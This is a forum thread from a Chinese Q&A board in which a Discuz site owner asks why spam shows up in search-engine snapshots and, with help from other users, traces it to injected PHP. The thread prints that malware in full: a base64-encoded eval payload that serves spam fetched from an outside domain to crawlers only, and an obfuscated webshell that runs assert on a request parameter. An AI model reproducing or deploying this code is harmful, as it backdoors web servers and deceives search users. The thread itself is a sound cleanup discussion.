V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Myflos
V2EX  ›  问与答

万能的工单系统,快照网站被挂马了怎么破

  •  
  •   Myflos · 2016-09-11 21:47:45 +08:00 · 1990 次点击
    这是一个创建于 2995 天前的主题,其中的信息可能已经有所发展或是发生改变。

    RT ,这些垃圾信息出现在网页快照的最上面,网页源码里没有找到,怎么处理是好,各位大侠请指点一二

    第 1 条附言  ·  2016-09-11 23:49:01 +08:00
    这个 360 的快照
    ![]( )

    google 快照是正常的;

    网站程序是 discuz x3.2
    5 条回复    2016-09-12 10:39:22 +08:00
    mrjoel
        1
    mrjoel  
       2016-09-11 22:00:12 +08:00
    发下网址吧
    mrjoel
        2
    mrjoel  
       2016-09-11 22:03:21 +08:00   ❤️ 1
    不方便发的话,你看下 360 快照里面有没有这些内容,百度和 google 都展示 js 内容,而 360 不展示。
    Myflos
        3
    Myflos  
    OP
       2016-09-11 23:28:20 +08:00
    @mrjoel 谢谢, 360 和百度都有, google 没有;网站是 discuz ,在 config_global.php ,找到如下代码

    @eval(base64_decode("CiRvcHRzID0gYXJyYXkoCiAgJ2h0dHAnPT5hcnJheSgKICAgICdtZXRob2QnPT4iR0VUIiwKICAgICd0aW1lb3V0Jz0+MTAsCiAgICkKKTsKJGNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoJG9wdHMpOwokZG9tYWluICA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOwoKaWYoaXNTcGlkZXIoKSl7CgkkY29udGVudD0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vbDQudHVhbmR1aTIzMTIuY29tL2xpbmsucGhwP2RvbWFpbj0nLiRkb21haW4uIiZzcGlkZXI9Ii5pc1NwaWRlcigpLiImcXVlcnk9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSksZmFsc2UsJGNvbnRleHQpOwoJZWNobyAkY29udGVudDsKfQpmdW5jdGlvbiBpc1NwaWRlcigpewoJJGJvdHMgPSBhcnJheSgKCQknYmFpZHUnICAgICAgICA9PiAnYmFpZHVzcGlkZXInLAoJCSdzb2dvdScgICAgICAgID0+ICdzb2dvdScsCgkJJzM2MHNwaWRlcicgICAgICAgID0+ICdoYW9zb3VzcGlkZXInLAoJCSczNjBzcGlkZXInICAgICAgICA9PiAnMzYwc3BpZGVyJywKCQknYmluZ2JvdCcgICAgICAgID0+ICdiaW5nYm90JwoJKTsKICAgICR1c2VyQWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CiAgICBmb3JlYWNoICgkYm90cyBhcyAkayA9PiAkdil7CiAgICAgICAgaWYgKHN0cmlzdHIoJHVzZXJBZ2VudCwkdikpewogICAgICAgICAgICByZXR1cm4gJGs7CiAgICAgICAgfQogICAgfQogICAgcmV0dXJuIGZhbHNlOwp9"));
    $_config = array();
    UnisandK
        4
    UnisandK  
       2016-09-12 00:04:28 +08:00   ❤️ 1
    针对搜索引擎爬虫输出的

    if(isSpider()){
    $content= @file_get_contents('http://l4.tuandui2312.com/link.php?domain='.$domain."&spider=".isSpider()."&query=".base64_encode($_SERVER['QUERY_STRING']),false,$context);
    echo $content;
    }
    Myflos
        5
    Myflos  
    OP
       2016-09-12 10:39:22 +08:00
    @UnisandK 谢谢,在另外几个 php 文件内找到了这样的代码

    @$bSzrL= "s\x74r\x5fr\x65\x70lac\x65";
    @$VwissV= @$bSzrL('drApO','','adrApOrdrApOraydrApO_drApOmdrApOap');
    @$ZXNFh= @$bSzrL('DBCFzQ','','asseDBCFzQrDBCFzQt');
    @$VwissV(@$ZXNFh,(array)@$_REQUEST['uikmsaya']);

    都删掉了,希望可以清除干净吧。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   917 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 19ms · UTC 21:27 · PVG 05:27 · LAX 13:27 · JFK 16:27
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.